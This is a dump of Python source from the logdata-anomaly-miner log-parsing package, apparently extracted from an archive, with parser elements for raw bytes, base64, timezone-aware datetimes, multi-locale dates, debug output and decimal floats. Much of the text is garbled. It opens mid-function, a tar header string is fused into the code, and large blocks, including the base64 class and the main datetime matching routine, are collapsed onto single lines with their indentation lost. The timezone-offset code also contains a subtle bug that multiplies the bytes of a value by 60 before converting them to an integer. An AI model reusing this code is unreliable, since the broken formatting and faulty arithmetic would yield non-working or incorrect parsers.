        for handler in self.atom_handler_list:
            handler.receive_atom(log_atom)
from aminer.parsing.MatchElement import MatchElement
from aminer.parsing.ModelElementInterface import ModelElementInterface


class AnyByteDataModelElement(ModelElementInterface):
    """Match every remaining byte, but at least one. A match therefore always spans the complete data from beginning to end."""

    def get_match_element(self, path: str, match_context):
        """
        Return a match covering all data left in the context.

        @param path to be printed in the MatchElement.
        @param match_context the match_context to be analyzed.
        @return None when no data is left, otherwise a MatchElement whose match string and match object are the remaining bytes.
        """
        remaining = match_context.match_data
        if not remaining:
            return None
        match_context.update(remaining)
        return MatchElement(f"{path}/{self.element_id}", remaining, remaining, None)
""" import base64 import re from aminer import AminerConfig from aminer.parsing.ModelElementInterface import ModelElementInterface from aminer.parsing.MatchElement import MatchElement class Base64StringModelElement(ModelElementInterface): """This class just tries to strip off as many base64 bytes as possible from a given data string.""" def __init__(self, element_id: str): """ Initialize the ModelElement. @param element_id an identifier for the ModelElement which is shown in the path. """ super().__init__(element_id) self.regex = re.compile(b"^(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?") def get_match_element(self, path: str, match_context): """ Find the maximum number of bytes forming an integer number according to the parameters specified. @param path to be printed in the MatchElement. @param match_context the match_context to be analyzed. @return a match when at least one byte being a digit was found. """ match = self.regex.match(match_context.match_data) if match is None or match.span()[1] == 0: return None match_len = match.span()[1] match_string = match_context.match_data[:match_len] match_context.update(match_string) try: match_value = base64.b64decode(match_string) # we need to check if no exception is raised when decoding the original string. match_value.decode(AminerConfig.ENCODING) except UnicodeDecodeError: match_value = match_string return MatchElement(f"{path}/{self.element_id}", match_string, match_value, None) DateTimeModelElement.py000066400000000000000000001011451437606560100351360ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing""" This module contains a datetime parser and helper classes for parsing. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. 
import sys
import time
import logging
import locale
from typing import Union, List, Set
from datetime import timezone, datetime
from aminer.AminerConfig import DEBUG_LOG_NAME
from aminer.parsing.ModelElementInterface import ModelElementInterface
from aminer.parsing.MatchElement import MatchElement

# Timezone abbreviation -> UTC offset in seconds. Several abbreviations are ambiguous in the real world (e.g. "IST", "CST",
# "AST"); this table fixes one meaning per name. Fractional-hour zones yield float offsets, the others int.
timezone_info = {
    "A": 1 * 3600, "ACDT": 10.5 * 3600, "ACST": 9.5 * 3600, "ACT": -5 * 3600, "ACWST": 8.75 * 3600, "ADT": 4 * 3600,
    "AEDT": 11 * 3600, "AEST": 10 * 3600, "AET": 10 * 3600, "AFT": 4.5 * 3600, "AKDT": -8 * 3600, "AKST": -9 * 3600,
    "ALMT": 6 * 3600, "AMST": -3 * 3600, "AMT": -4 * 3600, "ANAST": 12 * 3600, "ANAT": 12 * 3600, "AQTT": 5 * 3600,
    "ART": -3 * 3600, "AST": 3 * 3600, "AT": -4 * 3600, "AWDT": 9 * 3600, "AWST": 8 * 3600, "AZOST": 0 * 3600,
    "AZOT": -1 * 3600, "AZST": 5 * 3600, "AZT": 4 * 3600, "AoE": -12 * 3600, "B": 2 * 3600, "BNT": 8 * 3600,
    "BOT": -4 * 3600, "BRST": -2 * 3600, "BRT": -3 * 3600, "BST": 6 * 3600, "BTT": 6 * 3600, "C": 3 * 3600,
    "CAST": 8 * 3600, "CAT": 2 * 3600, "CCT": 6.5 * 3600, "CDT": -5 * 3600, "CEST": 2 * 3600, "CET": 1 * 3600,
    "CHADT": 13.75 * 3600, "CHAST": 12.75 * 3600, "CHOST": 9 * 3600, "CHOT": 8 * 3600, "CHUT": 10 * 3600,
    "CIDST": -4 * 3600, "CIST": -5 * 3600, "CKT": -10 * 3600, "CLST": -3 * 3600, "CLT": -4 * 3600, "COT": -5 * 3600,
    "CST": -6 * 3600, "CT": -6 * 3600, "CVT": -1 * 3600, "CXT": 7 * 3600, "ChST": 10 * 3600, "D": 4 * 3600,
    "DAVT": 7 * 3600, "DDUT": 10 * 3600, "E": 5 * 3600, "EASST": -5 * 3600, "EAST": -6 * 3600, "EAT": 3 * 3600,
    "ECT": -5 * 3600, "EDT": -4 * 3600, "EEST": 3 * 3600, "EET": 2 * 3600, "EGST": 0 * 3600, "EGT": -1 * 3600,
    "EST": -5 * 3600, "ET": -5 * 3600, "F": 6 * 3600, "FET": 3 * 3600, "FJST": 13 * 3600, "FJT": 12 * 3600,
    "FKST": -3 * 3600, "FKT": -4 * 3600, "FNT": -2 * 3600, "G": 7 * 3600, "GALT": -6 * 3600, "GAMT": -9 * 3600,
    "GET": 4 * 3600, "GFT": -3 * 3600, "GILT": 12 * 3600, "GMT": 0 * 3600, "GST": 4 * 3600, "GYT": -4 * 3600,
    "H": 8 * 3600, "HDT": -9 * 3600, "HKT": 8 * 3600, "HOVST": 8 * 3600, "HOVT": 7 * 3600, "HST": -10 * 3600,
    "I": 9 * 3600, "ICT": 7 * 3600, "IDT": 3 * 3600, "IOT": 6 * 3600, "IRDT": 4.5 * 3600, "IRKST": 9 * 3600,
    "IRKT": 8 * 3600, "IRST": 3.5 * 3600, "IST": 5.5 * 3600, "JST": 9 * 3600, "K": 10 * 3600, "KGT": 6 * 3600,
    "KOST": 11 * 3600, "KRAST": 8 * 3600, "KRAT": 7 * 3600, "KST": 9 * 3600, "KUYT": 4 * 3600, "L": 11 * 3600,
    "LHDT": 11 * 3600, "LHST": 10.5 * 3600, "LINT": 14 * 3600, "M": 12 * 3600, "MAGST": 12 * 3600, "MAGT": 11 * 3600,
    "MART": 9.5 * 3600, "MAWT": 5 * 3600, "MDT": -6 * 3600, "MHT": 12 * 3600, "MMT": 6.5 * 3600, "MSD": 4 * 3600,
    "MSK": 3 * 3600, "MST": -7 * 3600, "MT": -7 * 3600, "MUT": 4 * 3600, "MVT": 5 * 3600, "MYT": 8 * 3600,
    "N": -1 * 3600, "NCT": 11 * 3600, "NDT": 2.5 * 3600, "NFT": 11 * 3600, "NOVST": 7 * 3600, "NOVT": 7 * 3600,
    "NPT": 5.5 * 3600, "NRT": 12 * 3600, "NST": 3.5 * 3600, "NUT": -11 * 3600, "NZDT": 13 * 3600, "NZST": 12 * 3600,
    "O": -2 * 3600, "OMSST": 7 * 3600, "OMST": 6 * 3600, "ORAT": 5 * 3600, "P": -3 * 3600, "PDT": -7 * 3600,
    "PET": -5 * 3600, "PETST": 12 * 3600, "PETT": 12 * 3600, "PGT": 10 * 3600, "PHOT": 13 * 3600, "PHT": 8 * 3600,
    "PKT": 5 * 3600, "PMDT": -2 * 3600, "PMST": -3 * 3600, "PONT": 11 * 3600, "PST": -8 * 3600, "PT": -8 * 3600,
    "PWT": 9 * 3600, "PYST": -3 * 3600, "PYT": -4 * 3600, "Q": -4 * 3600, "QYZT": 6 * 3600, "R": -5 * 3600,
    "RET": 4 * 3600, "ROTT": -3 * 3600, "S": -6 * 3600, "SAKT": 11 * 3600, "SAMT": 4 * 3600, "SAST": 2 * 3600,
    "SBT": 11 * 3600, "SCT": 4 * 3600, "SGT": 8 * 3600, "SRET": 11 * 3600, "SRT": -3 * 3600, "SST": -11 * 3600,
    "SYOT": 3 * 3600, "T": -7 * 3600, "TAHT": -10 * 3600, "TFT": 5 * 3600, "TJT": 5 * 3600, "TKT": 13 * 3600,
    "TLT": 9 * 3600, "TMT": 5 * 3600, "TOST": 14 * 3600, "TOT": 13 * 3600, "TRT": 3 * 3600, "TVT": 12 * 3600,
    "U": -8 * 3600, "ULAST": 9 * 3600, "ULAT": 8 * 3600, "UTC": 0 * 3600, "UYST": -2 * 3600, "UYT": -3 * 3600,
    "UZT": 5 * 3600, "V": -9 * 3600, "VET": -4 * 3600, "VLAST": 11 * 3600, "VLAT": 10 * 3600, "VOST": 6 * 3600,
    "VUT": 11 * 3600, "W": -10 * 3600, "WAKT": 12 * 3600, "WARST": -3 * 3600, "WAST": 2 * 3600, "WAT": 1 * 3600,
    "WEST": 1 * 3600, "WET": 0 * 3600, "WFT": 12 * 3600, "WGST": -2 * 3600, "WGT": -3 * 3600, "WIB": 7 * 3600,
    "WIT": 9 * 3600, "WITA": 8 * 3600, "WST": 14 * 3600, "WT": 0 * 3600, "X": -11 * 3600, "Y": -12 * 3600,
    "YAKST": 10 * 3600, "YAKT": 9 * 3600, "YAPT": 10 * 3600, "YEKST": 6 * 3600, "YEKT": 5 * 3600, "Z": 0 * 3600}

# Bucket the abbreviations (as bytes) by their first byte, ASCII "A" (65) to "Z" (90). Within a bucket the longer names come
# first, so that a lookup can try the longest candidate before a shorter prefix ("CEST" before "CET" before "C"). Mixed-case
# names such as "AoE" and "ChST" land in the bucket of their upper-case first letter. Presumably consulted by the %z handling
# in get_match_element(), which lies outside this span.
search_tz_dict = {}
keys = list(timezone_info.keys())
keys.sort()
for idx in range(65, 91):
    search_tz_dict[idx] = [x.encode() for x in keys if x.encode()[0] == idx]
    search_tz_dict[idx].sort(key=len, reverse=True)  # sorts by descending length


class DateTimeModelElement(ModelElementInterface):
    """
    This class defines a model element to parse date or datetime values.

    The element is similar to the strptime function but does not use it due to the numerous problems associated with it, e.g. no leap
    year support for semiqualified years, no %s (seconds since epoch) format in Python strptime, no %f support in libc strptime, no
    support to determine the length of the parsed string.
    """

    # skipcq: PYL-W0613
    def __init__(self, element_id: str, date_format: bytes, time_zone: timezone = None, text_locale: Union[str, tuple] = None,
                 start_year: int = None, max_time_jump_seconds: int = 86400, timestamp_scale: int = 1):
        """
        Create a DateTimeModelElement to parse dates using a custom, timezone and locale-aware implementation similar to strptime.

        @param element_id an identifier for the ModelElement which is shown in the path.
        @param date_format, is a byte string that represents the date format for parsing, see Python strptime specification for
               available formats. Supported format specifiers are:
                 * %b: month name in current locale
                 * %d: day in month, can be space or zero padded when followed by separator or at end of string.
                 * %f: fraction of seconds (the digits after the ".")
                 * %H: hours from 00 to 23
                 * %M: minutes
                 * %m: two digit month number
                 * %S: seconds
                 * %s: seconds since the epoch (1970-01-01)
                 * %Y: 4 digit year number
                 * %z: detect and parse timezone strings like UTC, CET, +0001, etc. automatically.
               Common formats are:
                 * "%b %d %H:%M:%S" e.g. for "Nov 19 05:08:43"
                 * "%d.%m.%YT%H:%M:%S" e.g. for "07.02.2019T11:40:00"
                 * "%d.%m.%Y %H:%M:%S.%f" e.g. for "07.02.2019 11:40:00.123456"
                 * "%d.%m.%Y %H:%M:%S%z" e.g. for "07.02.2019 11:40:00+0000" or "07.02.2019 11:40:00 UTC"
                 * "%d.%m.%Y" e.g. for "07.02.2019"
                 * "%H:%M:%S" e.g. for "11:40:23"
        @param time_zone the timezone for parsing the values or UTC when None.
        @param text_locale the locale to use for parsing the day, month names or None to use the default locale. The locale must be a
               tuple of (locale, encoding) or a string.
        @param start_year when parsing date records without any year information, assume this is the year of the first value parsed.
        @param max_time_jump_seconds for detection of year wraps with date formats missing year information, also the current time of
               values has to be tracked. This value defines the window within that the time may jump between two matches. When not
               within that window, the value is still parsed, corrected to the most likely value but does not change the detection
               year.
        @param timestamp_scale scales the seconds in %s to get seconds (=1), milliseconds (=1000), microseconds (=1000000), etc.
        @raise ValueError (from scan_date_format) when date_format contains unknown, duplicated or conflicting specifiers.
        """
        self.text_locale = text_locale
        # The remaining keyword arguments are stored on self by the base class -- presumably including time_zone; the UTC
        # fallback below relies on that (base class is outside this file).
        super().__init__(element_id, date_format=date_format, time_zone=time_zone, text_locale=text_locale, start_year=start_year,
                         max_time_jump_seconds=max_time_jump_seconds, timestamp_scale=timestamp_scale)
        if time_zone is None:
            self.time_zone = timezone.utc
        # Make sure that date_format is valid and extract the relevant parts from it.
        self.format_has_year_flag = False
        self.format_has_tz_specifier = False
        self.date_format_parts: Union[List[Union[bytes, tuple]]] = []
        self.scan_date_format(date_format)
        if (not self.format_has_year_flag) and (start_year is None):
            # No year in the format and none given: assume timestamps belong to the current (UTC) year.
            self.start_year = time.gmtime(None).tm_year
        elif start_year is None:
            # this is needed so start_year is at any point an integer. (instead of being None)
            self.start_year = 0
        # Seconds since epoch of the last parsed value; 0 means "nothing parsed yet" for the year wraparound detection.
        self.last_parsed_seconds = 0
        self.epoch_start_time = datetime.fromtimestamp(0, self.time_zone)

    def scan_date_format(self, date_format: bytes):
        """
        Split date_format into literal byte runs and specifier tuples and store them in self.date_format_parts.

        Each specifier becomes a tuple (result index, fixed length or -1 for variable length, transform), where the result index
        is 0 year, 1 month, 2 day, 3 hour, 4 minute, 5 second, 6 fraction, 7 seconds since epoch. Adjacent literal runs are
        merged; %z only sets format_has_tz_specifier and is not added as a part.
        @raise Exception when called a second time after the parts were already built.
        @raise ValueError on an unknown specifier, on two specifiers for the same result index (note that %b and %m share index 1),
        or when %s is combined with any of the year..second specifiers.
        """
        if len(self.date_format_parts) > 0:
            msg = "Cannot rescan date format after initialization"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        date_format_parts: List[Union[bytes, tuple]] = []
        date_format_type_set: Set[int] = set()
        scan_pos = 0
        while scan_pos < len(date_format):
            next_param_pos = date_format.find(b"%", scan_pos)
            if next_param_pos < 0:
                next_param_pos = len(date_format)
            new_element: Union[bytes, tuple, None] = None
            if next_param_pos != scan_pos:
                # Literal text up to the next "%" (or the end of the format).
                new_element = date_format[scan_pos:next_param_pos]
            else:
                # A "%" at scan_pos: the specifier is the following byte (empty when "%" is the last byte -> unknown specifier).
                param_type_code = date_format[next_param_pos + 1:next_param_pos + 2]
                next_param_pos = scan_pos + 2
                if param_type_code == b"%":
                    new_element = b"%"
                elif param_type_code == b"b":
                    import calendar
                    # Three-letter month abbreviations taken from the process locale at scan time; text_locale is not
                    # consulted here (NOTE(review): confirm where text_locale is applied).
                    name_dict = {}
                    for month_pos in range(1, 13):
                        name_dict[calendar.month_name[month_pos][:3].encode()] = month_pos
                    new_element = (1, 3, name_dict)
                elif param_type_code == b"d":
                    new_element = (2, 2, int)
                elif param_type_code == b"f":
                    new_element = (6, -1, DateTimeModelElement.parse_fraction)
                elif param_type_code == b"H":
                    new_element = (3, 2, int)
                elif param_type_code == b"M":
                    new_element = (4, 2, int)
                elif param_type_code == b"m":
                    new_element = (1, 2, int)
                elif param_type_code == b"S":
                    new_element = (5, 2, int)
                elif param_type_code == b"s":
                    new_element = (7, -1, int)
                elif param_type_code == b"Y":
                    self.format_has_year_flag = True
                    new_element = (0, 4, int)
                elif param_type_code == b"z":
                    self.format_has_tz_specifier = True
                    scan_pos = next_param_pos
                    continue
                else:
                    msg = f"Unknown dateformat specifier {repr(param_type_code)}"
                    logging.getLogger(DEBUG_LOG_NAME).error(msg)
                    raise ValueError(msg)
            if isinstance(new_element, bytes):
                # Merge consecutive literal runs (e.g. text followed by an escaped "%%").
                if date_format_parts and (isinstance(date_format_parts[-1], bytes)):
                    date_format_parts[-1] += new_element
                else:
                    date_format_parts.append(new_element)
            else:
                if new_element[0] in date_format_type_set:
                    msg = f"Multiple format specifiers for type {new_element[0]}"
                    logging.getLogger(DEBUG_LOG_NAME).error(msg)
                    raise ValueError(msg)
                date_format_type_set.add(new_element[0])
                date_format_parts.append(new_element)
            scan_pos = next_param_pos
        # %s (index 7) may only be combined with %f (index 6), never with calendar fields 0..5.
        if (7 in date_format_type_set) and (not date_format_type_set.isdisjoint(set(range(0, 6)))):
            msg = "Cannot use %s (seconds since epoch) with other non-second format types"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        self.date_format_parts = date_format_parts
""" parse_pos = 0 # Year, month, day, hour, minute, second, fraction, gmt-seconds: result: List = [0, 0, 0, 0, 0, 0, 0, 0] for part_pos, date_format_part in enumerate(self.date_format_parts): if isinstance(date_format_part, bytes): if not match_context.match_data[parse_pos:].startswith(date_format_part): return None parse_pos += len(date_format_part) continue next_length = date_format_part[1] next_data = None if next_length < 0: # No length given: this is only valid for integer fields or fields followed by a separator string. if (part_pos + 1) < len(self.date_format_parts): next_part = self.date_format_parts[part_pos + 1] if isinstance(next_part, bytes): end_pos = match_context.match_data.find(next_part, parse_pos) if end_pos < 0: return None next_length = end_pos - parse_pos if next_length < 0: # No separator, so get the number of decimal digits. next_length = 0 for digit_ord in match_context.match_data[parse_pos:]: if (digit_ord < 0x30) or (digit_ord > 0x39): break next_length += 1 if next_length == 0: return None next_data = match_context.match_data[parse_pos:parse_pos + next_length] else: next_data = match_context.match_data[parse_pos:parse_pos + next_length] if len(next_data) != next_length: return None parse_pos += next_length transform_function = date_format_part[2] if isinstance(transform_function, dict): value = None try: value = transform_function.get(next_data, None) except ValueError: pass if value is None: return None result[date_format_part[0]] = value else: try: result[date_format_part[0]] = transform_function(next_data) except ValueError: # Parsing failed, most likely due to wrong format. return None date_str = match_context.match_data[:parse_pos] result[7] /= self.timestamp_scale # Now combine the values and build the final value. parsed_date_time = None total_seconds = result[7] if total_seconds != 0: # skipcq: PTC-W0048 total_seconds += result[6] # For epoch second formats, the datetime value usually is not important. 
So stay with parsed_date_time to none. else: if not self.format_has_year_flag: result[0] = self.start_year microseconds = int(result[6] * 1000000) try: if 0 in (result[0], result[1], result[2]): current_date = datetime.now() if result[0] == 0: result[0] = current_date.year if result[1] == 0: result[1] = current_date.month if result[2] == 0: result[2] = current_date.day parsed_date_time = datetime(result[0], result[1], result[2], result[3], result[4], result[5], microseconds, self.time_zone) except ValueError: # The values did not form a valid datetime object, e.g. when the day of month is out of range. The rare case where dates # without year are parsed and the last parsed timestamp was from the previous non-leap year but the current timestamp is it, # is ignored. Values that sparse and without a year number are very likely to result in invalid data anyway. return None # Avoid timedelta.total_seconds(), not supported in Python 2.6. delta = parsed_date_time - self.epoch_start_time total_seconds = (delta.days * 86400 + delta.seconds) # See if this is change from one year to next. if not self.format_has_year_flag: if self.last_parsed_seconds == 0: # There cannot be a wraparound if we do not know any previous time values yet. self.last_parsed_seconds = total_seconds else: delta_seconds = self.last_parsed_seconds - total_seconds if abs(delta_seconds) <= self.max_time_jump_seconds: self.last_parsed_seconds = total_seconds else: # This might be the first date value for the next year or one from the previous. # Test both cases and see, what is more likely. 
date_error = False try: next_year_date_time = parsed_date_time.replace(self.start_year + 1) delta = next_year_date_time - self.epoch_start_time next_year_total_seconds = (delta.days * 86400 + delta.seconds) except ValueError: date_error = True if not date_error and next_year_total_seconds - self.last_parsed_seconds <= self.max_time_jump_seconds: self.start_year += 1 parsed_date_time = next_year_date_time total_seconds = next_year_total_seconds self.last_parsed_seconds = total_seconds msg = f"DateTimeModelElement unqualified timestamp year wraparound detected from " \ f"{datetime.fromtimestamp(self.last_parsed_seconds, self.time_zone).isoformat()} to " \ f"{parsed_date_time.isoformat()}" logging.getLogger(DEBUG_LOG_NAME).warning(msg) print("WARNING: " + msg, file=sys.stderr) else: try: last_year_date_time = parsed_date_time.replace(self.start_year - 1) delta = last_year_date_time - self.epoch_start_time last_year_total_seconds = (delta.days * 86400 + delta.seconds) except ValueError: date_error = True if not date_error and self.last_parsed_seconds - last_year_total_seconds <= self.max_time_jump_seconds: parsed_date_time = last_year_date_time total_seconds = last_year_total_seconds self.last_parsed_seconds = total_seconds else: # None of both seems correct, just report that. msg = f"DateTimeModelElement time inconsistencies parsing {repr(date_str)}, expecting value around " \ f"{self.last_parsed_seconds}. Check your settings!" logging.getLogger(DEBUG_LOG_NAME).warning(msg) print("WARNING: " + msg, file=sys.stderr) # We discarded the parsed_date_time microseconds beforehand, use the full float value here instead of the rounded integer. if result[6] is not None: total_seconds += result[6] if self.format_has_tz_specifier: valid_tz_specifier = True offset_allowed = True tz_specifier_offset = 0. if match_context.match_data[parse_pos] == ord(b" "): parse_pos += 1 resulting_key = None # only if the next character is in A-Z, a valid resulting_key can exist. 
if match_context.match_data[parse_pos] in search_tz_dict: # search the first fitting resulting_key in the sorted tz_dict and break the loop. for key in search_tz_dict[match_context.match_data[parse_pos]]: if match_context.match_data[parse_pos:].startswith(key): resulting_key = key break # an offset is only allowed with UTC and GMT. if resulting_key not in (b"UTC", b"GMT"): offset_allowed = False if resulting_key is not None: # get the offset from the timezone_info dict. tz_specifier_offset = timezone_info[resulting_key.decode()] parse_pos += len(resulting_key) if match_context.match_data[parse_pos] in (ord(b"+"), ord(b"-")) and offset_allowed and valid_tz_specifier: sign = -1 if match_context.match_data[parse_pos] == ord(b"+"): sign = 1 parse_pos += 1 cnt_digits = 0 colon_shift = 0 # parse data as long as there is more data. while parse_pos < len(match_context.match_data): # shift the position and count to the next position, if the current character is a digit. if chr(match_context.match_data[parse_pos]).isdigit(): cnt_digits += 1 parse_pos += 1 # if the current character is no digit and cnt_digits is 2, a colon is allowed. elif cnt_digits == 2 and match_context.match_data[parse_pos] == ord(b":"): parse_pos += 1 colon_shift = 1 else: break # if the digit count is not 4 and a colon is found, then no colon shift should be applied. This could be the case, if a # colon follows the date (02.11.2021 UTC+01: some text) if cnt_digits != 4 and colon_shift == 1: parse_pos -= 1 colon_shift = 0 # if the digits count is zero or bigger than 4, then the specifier is not valid. if cnt_digits == 0 or cnt_digits > 4: valid_tz_specifier = False else: # only one hour position was found. if cnt_digits == 1: tz_specifier_offset = sign * int(chr(match_context.match_data[parse_pos-1])) * 3600 # two hours specifiers were found. 
elif cnt_digits == 2: tz_specifier_offset = sign * int(match_context.match_data[parse_pos-2:parse_pos].decode()) * 3600 # four time specifiers were found with an optional colon. elif cnt_digits == 4: tz_specifier_offset = sign * int(match_context.match_data[parse_pos-4-colon_shift:parse_pos-2-colon_shift]) * \ 3600 + int(match_context.match_data[parse_pos-2:parse_pos] * 60) if valid_tz_specifier: date_str = match_context.match_data[:parse_pos] # the offset must be subtracted, because the timestamp should always be UTC. total_seconds -= tz_specifier_offset match_context.update(date_str) return MatchElement(f"{path}/{self.element_id}", date_str, total_seconds, None) @staticmethod def parse_fraction(value_str: bytes): """Pass this method as function pointer to the parsing logic.""" return float(b"0." + value_str) class MultiLocaleDateTimeModelElement(ModelElementInterface): """ This class defines a model element to parse date or datetime values from log sources. The date or datetime can contain timestamps encoded in different locales or on machines, where host/service locale does not match data locale(s). CAVEAT: Unlike other model elements, this element is not completely stateless! As parsing of semi qualified date values without any year information may produce wrong results, e.g. wrong year or 1 day off due to incorrect leap year handling, this object will keep track of the most recent timestamp parsed and will use it to regain information about the year in semi qualified date values. Still this element will not complain when parsed timestamp values are not strictly sorted, this should be done by filtering modules later on. The sorting requirements here are only, that each new timestamp value may not be more than 2 days before and 1 month after the most recent one observer. Internal operation: * When creating the object, make sure that there are no ambiguous dateFormats in the list, e.g. one with "day month" and another one with "month day". 
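* To avoid decoding of binary input data in all locales before searching for e.g. month names, convert all possible month
      names to bytes during object creation and just keep the lookup list.
    """

    def __init__(self, element_id: str, date_formats: list, start_year: int = None, max_time_jump_seconds: int = 86400):
        """
        Create a new MultiLocaleDateTimeModelElement object.
        @param element_id an identifier for the ModelElement which is shown in the path.
        @param date_formats this parameter is a list of tuples, each tuple containing information about one date format to
        support. The tuple structure is (format_string, format_timezone, format_locale). The format_string may contain the same
        elements as supported by strptime from datetime.datetime. The format_locale defines the locale for the string content,
        e.g. de_DE for german, but also the data IO encoding, e.g. ISO-8859-1. The locale information has to be available, e.g.
        using "locale-gen" on Debian systems. The format_timezone can be used to define the timezone of the timestamp parsed.
        When None, UTC is used. The timezone support may only be sufficient for very simple use-cases, e.g. all data from one
        source configured to create timestamps in that timezone.
        @param start_year when given, parsing will use this year value for semi qualified timestamps to add correct year
        information. This is especially relevant for historic datasets as otherwise leap year handling may fail. The startYear
        parameter will only take effect when the first timestamp to be parsed by this object is also semi qualified. Otherwise,
        the year information is extracted from this record. When empty and first parsing invocation involves a semi qualified
        date, the current year in UTC timezone is used.
        @param max_time_jump_seconds for detection of year wraps with date formats missing year information, also the current
        time of values has to be tracked. This value defines the window within that the time may jump between two matches.
        When not within that window, the value is still parsed, corrected to the most likely value but does not change the
        detection year.
        @raise ValueError when date_formats is empty, a tuple has not exactly 3 elements, text_locale is empty or a format
        is a prefix of an earlier one.
        @raise TypeError when an entry of date_formats is not a tuple.
        """
        super().__init__(element_id, start_year=start_year, max_time_jump_seconds=max_time_jump_seconds)
        if len(date_formats) == 0:
            msg = "At least one date_format must be specified."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        # Stays True only while every format seen so far carries a year (%Y). The accumulator has to start as True, otherwise
        # the "and" below can never become True and the flag is meaningless.
        all_formats_have_year = True
        default_locale = locale.getdefaultlocale()
        self.date_time_model_elements: List[DateTimeModelElement] = []
        for i, date_format in enumerate(date_formats):
            if not isinstance(date_format, tuple):
                msg = "date_format must be of type tuple."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise TypeError(msg)
            if len(date_format) != 3:
                msg = "date_format consist of 3 elements."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise ValueError(msg)
            date_format, time_zone, text_locale = date_format
            if isinstance(text_locale, str) and len(text_locale) < 1:
                msg = "empty text_locale is not allowed."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise ValueError(msg)
            # A format that extends an earlier one could never win, because the earlier (shorter) one is tried first.
            for date_time_model_element in self.date_time_model_elements:
                if date_format.startswith(date_time_model_element.date_format):
                    msg = f"Invalid order of date_formats. {date_format.decode()} starts with " \
                          f"{date_time_model_element.date_format.decode()}. More specific datetimes would be skipped."
                    logging.getLogger(DEBUG_LOG_NAME).error(msg)
                    raise ValueError(msg)
            self.date_time_model_elements.append(DateTimeModelElement(
                element_id + "/format" + str(i), date_format, time_zone, text_locale, start_year, max_time_jump_seconds))
            all_formats_have_year = all_formats_have_year and self.date_time_model_elements[-1].format_has_year_flag
        # The latest parsed timestamp value.
        self.latest_parsed_timestamp = None
        # Restore previous locale settings. There seems to be no way in python to get back to the exact same state. Hence
        # perform the reset only when locale has changed. This would also change the locale from (None, None) to some
        # system-dependent locale.
        if locale.getlocale() != default_locale:
            locale.resetlocale()
        if (not all_formats_have_year) and (start_year is None):
            self.start_year = time.gmtime(None).tm_year
        elif start_year is None:
            # this is needed so start_year is at any point an integer. (instead of being None)
            self.start_year = 0
        self.last_parsed_seconds = 0

    def get_match_element(self, path: str, match_context):
        """
        Check if the data to match within the content is suitable to be parsed by any of the supplied date formats.
        @param path to be printed in the MatchElement.
        @param match_context the match_context to be analyzed.
        @return On match return the MatchElement of the first format that matched, whose match_object is the seconds since
        1970. When not matching, None is returned. When the timestamp data parsed would be far off from the last ones parsed, so
        that correction may not be applied correctly, then the method will also return None.
        """
        for date_time_model_element in self.date_time_model_elements:
            # setlocale() changes process-global state, so this element must not be used from several threads concurrently.
            locale.setlocale(locale.LC_ALL, date_time_model_element.text_locale)
            # Hand the shared year tracking state to the child before matching and take it back when it matched.
            date_time_model_element.last_parsed_seconds = self.last_parsed_seconds
            date_time_model_element.start_year = self.start_year
            match_element = date_time_model_element.get_match_element(path, match_context)
            if match_element is not None:
                self.last_parsed_seconds = date_time_model_element.last_parsed_seconds
                self.start_year = date_time_model_element.start_year
                return match_element
        return None
# ---- archive member: logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing/DebugModelElement.py ----
"""
This module defines a debug model element that can be used to check whether a specific position in the parsing tree is reached by
log atoms.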
This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see .
"""
import sys
import logging
from aminer.AminerConfig import DEBUG_LOG_NAME
from aminer.parsing.MatchElement import MatchElement
from aminer.parsing.ModelElementInterface import ModelElementInterface


class DebugModelElement(ModelElementInterface):
    """
    This class defines a model element matching any data of length zero at any position.
    Thus, it can never fail to match and can be inserted at any position in the parsing tree, where matching itself does not alter
    parsing flow (see e.g. FirstMatchModelElement). It will immediately write the current state of the match to stderr for
    inspection.
    """

    def __init__(self, element_id: str):
        """
        Initialize the ModelElement.
        @param element_id an identifier for the ModelElement which is shown in the path.
        """
        super().__init__(element_id)
        # To avoid having those elements hidden in production configuration, write a line every time the class is instantiated.
        self._report(f"DebugModelElement {element_id} added")

    def get_match_element(self, path: str, match_context):
        """
        Report the current parser position and return an empty match.
        @param path to be printed in the MatchElement.
        @param match_context the match_context to be analyzed; its match_data is printed as repr() and left untouched.
        @return Always return a match of zero length.
        """
        element_path = f"{path}/{self.element_id}"
        self._report(f'DebugModelElement path = "{element_path}", unmatched = "{match_context.match_data!r}"')
        return MatchElement(element_path, b"", b"", None)

    @staticmethod
    def _report(msg: str):
        """Write msg both to the debug log and to stderr."""
        logging.getLogger(DEBUG_LOG_NAME).info(msg)
        print(msg, file=sys.stderr)
# ---- archive member: logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing/DecimalFloatValueModelElement.py ----
"""
This module defines an model element for decimal number parsing as float.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see .
"""
from aminer.parsing.ModelElementInterface import ModelElementInterface
from aminer.parsing.MatchElement import MatchElement


class DecimalFloatValueModelElement(ModelElementInterface):
    """
    This class defines a model to parse decimal values with optional signum, padding or exponent.
    With padding, the signum has to be found before the padding characters.
    """

    SIGN_TYPE_NONE = "none"
    SIGN_TYPE_OPTIONAL = "optional"
